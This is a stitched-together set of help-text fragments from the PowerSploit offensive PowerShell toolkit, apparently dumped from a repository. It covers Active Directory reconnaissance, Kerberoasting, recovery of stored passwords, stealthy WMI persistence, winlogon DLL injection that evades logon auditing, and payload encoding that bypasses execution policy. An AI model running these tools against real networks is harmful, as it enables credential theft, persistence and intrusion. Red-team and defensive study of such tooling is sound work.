 This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
 are in the specified local group for a target machine through GPO correlation.
 .
 If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
 determine the OU the computer is a part of.
 Then resolve the computer's site name with
 Get-NetComputerSiteName and retrieve all sites object Get-DomainSite.
 For those results, attempt to
 enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup.
 For
 each resulting GPO group, resolve the resulting user/group name to a full AD object and
 return the results.
 This will return the domain objects that are members of the specified
 -LocalGroup for the given computer.
 .
 Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
 localgroup specifications.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
 ```
 .
 Finds users who have local admin rights over WINDOWS3 through GPO correlation.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
 ```
 .
 Finds users who have RDP rights over WINDOWS4 through GPO correlation.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Get-ApplicationHost.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ApplicationHost.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ApplicationHost
 ```
 .
 ## DESCRIPTION
 This script will decrypt and recover application pool and virtual directory passwords
 from the applicationHost.config file on the system.
 The output supports the
 pipeline which can be used to convert all of the results into a pretty table by piping
 to format-table.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Return application pool and virtual directory passwords from the applicationHost.config on the system.
 ```
 .
 Get-ApplicationHost
 .
 user    : PoolUser1
 pass    : PoolParty1!
 type    : Application Pool
 vdir    : NA
 apppool : ApplicationPool1
 user    : PoolUser2
 pass    : PoolParty2!
 type    : Application Pool
 vdir    : NA
 apppool : ApplicationPool2
 user    : VdirUser1
 pass    : VdirPassword1!
 type    : Virtual Directory
 vdir    : site1/vdir1/
 apppool : NA
 user    : VdirUser2
 pass    : VdirPassword2!
 type    : Virtual Directory
 vdir    : site2/
 apppool : NA
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Return a list of cleartext and decrypted connect strings from web.config files.
 ```
 .
 Get-ApplicationHost | Format-Table -Autosize
 .
 user          pass               type              vdir         apppool

Files:     docs/Recon/Test-AdminAccess.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Test-AdminAccess.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Test-AdminAccess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will use the OpenSCManagerW Win32API call to establish
 a handle to the remote host.
 If this succeeds, the current user context
 has local administrator acess to the target.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Test-AdminAccess -ComputerName sqlserver
 ```
 .
 Returns results indicating whether the current user has admin access to the 'sqlserver' host.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainComputer | Test-AdminAccess
 ```
 .
 Returns what machines in the domain the current user has access to.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Recon/Resolve-IPAddress.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Resolve-IPAddress.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Resolve-IPAddress [[-ComputerName] <String[]>]
 ```
 .
 ## DESCRIPTION
 Resolves a given hostename to its associated IPv4 address using
 .
 If no hostname is provided, the default
 is the IP address of the localhost.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Resolve-IPAddress -ComputerName SERVER
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 @("SERVER1", "SERVER2") | Resolve-IPAddress
 ```
 .
 ## PARAMETERS
 .
 ### -ComputerName
 {{Fill ComputerName Description}}
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases: HostName, dnshostname, name
 .
 Required: False
 Position: 1
 Default value: $Env:COMPUTERNAME
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ### String
 .
 Accepts one or more IP address strings on the pipeline.
 .
 ## OUTPUTS
 .
 ### System.Management.Automation.PSCustomObject
 .
 A custom PSObject with the ComputerName and IPAddress.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-DomainSubnet.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainSubnet.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainSubnet [[-Identity] <String[]>] [-SiteName <String>] [-Domain <String>] [-LDAPFilter <String>]
 [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
 [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties whencreated,usnchanged,...".
 By default, all subnet objects for
 the current domain are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainSubnet
 ```
 .
 Returns the current subnets in the domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainSubnet *admin* -Domain testlab.local
 ```
 .
 Returns all subnets with "admin" in their name in the testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
 ```
 .
 Returns all subnets with linked to the specified group policy object.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Find-DomainUserLocation.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-DomainUserLocation.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### UserGroupIdentity (Default)
 ```
 Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>]
 [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
 ```
 .
 ### UserIdentity
 ```
 Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
 [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
 ```
 .
 ### ShowAll
 ```
 Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserAdminCount]
 [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
 [-Jitter <Double>] [-ShowAll] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
 ```
 .
 ## DESCRIPTION
 This function enumerates all machines on the current (or specified) domain
 using Get-DomainComputer, and queries the domain for users of a specified group
 (default 'Domain Admins') with Get-DomainGroupMember.
 Then for each server the
 function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
 The found user list is compared against the target list, and any matches are
 displayed.
 If -ShowAll is specified, all results are displayed instead of
 the filtered set.
 If -Stealth is specified, then likely highly-trafficed servers
 are enumerated with Get-DomainFileServer/Get-DomainController, and session
 enumeration is executed only against those servers.
 If -Credential is passed,
 then Invoke-UserImpersonation is used to impersonate the specified user
 before enumeration, reverting after with Invoke-RevertToSelf.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-DomainUserLocation
 ```
 .
 Searches for 'Domain Admins' by enumerating every computer in the domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-DomainUserLocation -Stealth -ShowAll
 ```
 .
 Enumerates likely highly-trafficked servers, performs just session enumeration
 against each, and outputs all results.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
 ```
 .
 Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
 users in dev.testlab.local.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     Persistence/Persistence.psm1
Copyright: __NO_COPYRIGHT__ in: Persistence/Persistence.psm1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
 .
 .PARAMETER PermanentWMI
 .
 Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.
 .
 Detection Difficulty:        Difficult
 Removal Difficulty:          Difficult

Files:     docs/Recon/Get-DomainSite.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainSite.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainSite [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
 [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
 [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties whencreated,usnchanged,...".
 By default, all site objects for
 the current domain are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainSite
 ```
 .
 Returns the current sites in the domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainSite *admin* -Domain testlab.local
 ```
 .
 Returns all sites with "admin" in their name in the testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
 ```
 .
 Returns all sites with linked to the specified group policy object.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Find-InterestingDomainAcl.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-InterestingDomainAcl.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-InterestingDomainAcl [[-Domain] <String>] [-ResolveGUIDs] [-RightsFilter <String>] [-LDAPFilter <String>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
 and for each returned ACE entry it checks if principal security identifier
 is *-1000 (meaning the account is not built in), and also checks if the rights for
 the ACE mean the object can be modified by the principal.
 If these conditions are met,
 then the security identifier SID is translated, the domain object is retrieved, and
 additional IdentityReference* information is appended to the output object.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-InterestingDomainAcl
 ```
 .
 Finds interesting object ACLS in the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
 ```
 .
 Finds interesting object ACLS in the ev.testlab.local domain and
 resolves rights GUIDs to display names.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     ScriptModification/Out-EncodedCommand.ps1
Copyright: __NO_COPYRIGHT__ in: ScriptModification/Out-EncodedCommand.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
 .
 .PARAMETER ScriptBlock
 .
 Specifies a scriptblock containing your payload.
 .
 .PARAMETER Path
 .
 Specifies the path to your payload.
 .
 .PARAMETER NoExit
 .
 Outputs the option to not exit after running startup commands.
 .
 .PARAMETER NoProfile
 .
 Outputs the option to not load the Windows PowerShell profile.
 .
 .PARAMETER NonInteractive
 .
 Outputs the option to not present an interactive prompt to the user.
 .
 .PARAMETER Wow64

Files:     Recon/PowerView.ps1
Copyright: __NO_COPYRIGHT__ in: Recon/PowerView.ps1
License:   __UNKNOWN__
 #>
 .
 ########################################################
 #
 # PSReflect code for Windows API access
 # Author: @mattifestation
 #   https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1
 #
 ########################################################
 .
 function New-InMemoryModule {
 <#
 .SYNOPSIS
 .
 Creates an in-memory assembly and module
 .
 .DESCRIPTION
 .
 When defining custom enums, structs, and unmanaged functions, it is
 necessary to associate to an assembly module. This helper function
 creates an in-memory module that can be passed to the 'enum',
 'struct', and Add-Win32Type functions.
 .
 .PARAMETER ModuleName
 .
 Specifies the desired name for the in-memory assembly and module. If
 ModuleName is not provided, it will default to a GUID.
 .
 .EXAMPLE

Files:     docs/Persistence/Add-Persistence.md
Copyright: __NO_COPYRIGHT__ in: docs/Persistence/Add-Persistence.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### ScriptBlock
 ```
 Add-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
 [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
 [-DoNotPersistImmediately] [-PassThru]
 ```
 .
 ### FilePath
 ```
 Add-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
 [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
 [-DoNotPersistImmediately] [-PassThru]
 ```
 .
 ## DESCRIPTION
 Add-Persistence will add persistence capabilities to any script or scriptblock.
 This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Privesc/Get-ModifiableRegistryAutoRun.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ModifiableRegistryAutoRun.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ModifiableRegistryAutoRun
 ```
 .
 ## DESCRIPTION
 Enumerates a number of autorun specifications in HKLM and filters any
 autoruns through Get-ModifiablePath, returning any file/config locations
 in the found path strings that the current user can modify.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ModifiableRegistryAutoRun
 ```
 .
 Return vulneable autorun binaries (or associated configs).
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.ModifiableRegistryAutoRun
 .
 Custom PSObject containing results.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-NetComputerSiteName.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetComputerSiteName.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetComputerSiteName [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will use the DsGetSiteName Win32API call to look up the
 name of the site where a specified computer resides.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
 ```
 .
 Returns the site for WINDOWS1.testlab.local.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainComputer | Get-NetComputerSiteName
 ```
 .
 Returns the sites for every machine in AD.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Recon/Get-DomainForeignGroupMember.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainForeignGroupMember.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainForeignGroupMember [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
 then enumerates the members of each group, and compares the member's domain
 name to the parent group's domain name, outputting the member if the domains differ.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainForeignGroupMember
 ```
 .
 Return all group members in the current domain where the group and member differ.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainForeignGroupMember -Domain dev.testlab.local
 ```
 .
 Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     CodeExecution/Invoke-Shellcode.ps1
Copyright: __NO_COPYRIGHT__ in: CodeExecution/Invoke-Shellcode.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
 .
 PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):

Files:     docs/Recon/Get-DomainManagedSecurityGroup.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainManagedSecurityGroup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainManagedSecurityGroup [[-Domain] <String>] [-SearchBase <String>] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
 [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Authority to manipulate the group membership of AD security groups and distribution groups
 can be delegated to non-administrators by setting the 'managedBy' attribute.
 This is typically
 used to delegate management authority to distribution groups, but Windows supports security groups
 being managed in the same way.
 .
 This function searches for AD groups which have a group manager set, and determines whether that
 user can manipulate group membership.
 This could be a useful method of horizontal privilege
 escalation, especially if the manager can manipulate the membership of a privileged group.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
 ```
 .
 Store a list of all security groups with managers in group-managers.csv
 .
 ## PARAMETERS
 .
 ### -Domain
 Specifies the domain to use for the query, defaults to the current domain.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: Name
 .
 Required: False
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -SearchBase
 The LDAP source to search through, e.g.

Files:     docs/Recon/Invoke-Kerberoast.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Invoke-Kerberoast.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-Kerberoast [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
 [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
 [-OutputFormat <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Uses Get-DomainUser to query for user accounts with non-null service principle
 names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
 The ticket format can be specified with -OutputFormat \<John/Hashcat\>.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-Kerberoast | fl
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Invoke-Kerberoast -Domain dev.testlab.local | fl
 ```
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Write-UserAddMSI.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Write-UserAddMSI.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Write-UserAddMSI [[-Path] <String>]
 ```
 .
 ## DESCRIPTION
 Writes out a precompiled MSI installer that prompts for a user/group addition.
 This function can be used to abuse Get-RegistryAlwaysInstallElevated.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Write-UserAddMSI
 ```
 .
 Writes the user add MSI to the local directory.
 .
 ## PARAMETERS
 .
 ### -Path
 {{Fill Path Description}}
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: ServiceName
 .
 Required: False
 Position: 1
 Default value: UserAdd.msi
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.UserAddMSI
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-DomainObject.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainObject.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainObject [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
 [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties samaccountname,usnchanged,...".
 By default, all objects for
 the current domain are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainObject -Domain testlab.local
 ```
 .
 Return all objects for the testlab.local domain
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Recon/ConvertFrom-SID.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/ConvertFrom-SID.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 ConvertFrom-SID [-ObjectSid] <String[]> [[-Domain] <String>] [[-Server] <String>]
 [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Converts a security identifier string (SID) to a group/user name
 using Convert-ADName.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
 ```
 .
 TESTLAB\harmj0y
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 "S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
 ```
 .
 TESTLAB\WINDOWS2$
 TESTLAB\harmj0y
 BUILTIN\Distributed COM Users
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     Exfiltration/Invoke-CredentialInjection.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Invoke-CredentialInjection.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
 The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to
 winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or
 logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.
 .
 .PARAMETER NewWinLogon
 .
 Switch. Specifies that this script should create a new WinLogon.exe process. This may be suspicious, as log correlation can show winlogon.exe was
 created by PowerShell.exe. This CANNOT be used if the script is run from Session 0 (winlogon requires a desktop is available, and session 0 doesn't have one).
 .
 .PARAMETER ExistingWinLogon
 .
 Switch. Specifies that this script should use an existing WinLogon.exe process. This will leave behind code (a reflectively loaded DLL) in the process.
 .
 .PARAMETER DomainName
 .
 The domain name of the user account.
 .
 .PARAMETER UserName
 .
 The username to log in with.
 .
 .PARAMETER Password
 .
 The password of the user.
 .
 .PARAMETER LogonType
 .
 The logon type of the injected logon. Can be Interactive, RemoteInteractive, or NetworkCleartext
 .
 .PARAMETER AuthPackage

Files:     docs/Recon/Find-DomainUserEvent.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-DomainUserEvent.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### Domain (Default)
 ```
 Find-DomainUserEvent [-Domain <String>] [-Filter <Hashtable>] [-StartTime <DateTime>] [-EndTime <DateTime>]
 [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>]
 [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount] [-CheckAccess] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
 [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ### ComputerName
 ```
 Find-DomainUserEvent [[-ComputerName] <String[]>] [-Filter <Hashtable>] [-StartTime <DateTime>]
 [-EndTime <DateTime>] [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>]
 [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount]
 [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
 [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>]
 [-Threads <Int32>]
 ```
 .
 ## DESCRIPTION
 Enumerates all domain controllers from the specified -Domain
 (default of the local domain) using Get-DomainController, enumerates
 the logon events for each using Get-DomainUserEvent, and filters
 the results based on the targeting criteria.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-DomainUserEvent
 ```
 .
 Search for any user events matching domain admins on every DC in the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     Exfiltration/Get-GPPAutologon.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Get-GPPAutologon.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
 .
 .EXAMPLE
 .
 PS C:\> Get-GPPAutolgon
 .
 UserNames                                    File                                         Passwords

Files:     docs/Privesc/Get-ProcessTokenGroup.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ProcessTokenGroup.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ProcessTokenGroup [[-Id] <UInt32>]
 ```
 .
 ## DESCRIPTION
 First, if a process ID is passed, then the process is opened using OpenProcess(),
 otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
 OpenProcessToken() is then used to get a handle to the specified process token.
 The token
 is then passed to Get-TokenInformation to query the current token groups for the specified
 token.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ProcessTokenGroup
 ```
 .
 SID                                              Attributes                     ProcessId

Files:     docs/Recon/Remove-RemoteConnection.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Remove-RemoteConnection.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### ComputerName (Default)
 ```
 Remove-RemoteConnection [-ComputerName] <String[]>
 ```
 .
 ### Path
 ```
 Remove-RemoteConnection [-Path] <String[]>
 ```
 .
 ## DESCRIPTION
 This function uses WNetCancelConnection2 to destroy a connection created by
 New-RemoteConnection.
 If a -Path isn't specified, a -ComputerName is required to
 'unmount' \\\\$ComputerName\IPC$.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
 ```
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 @('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
 ```
 .
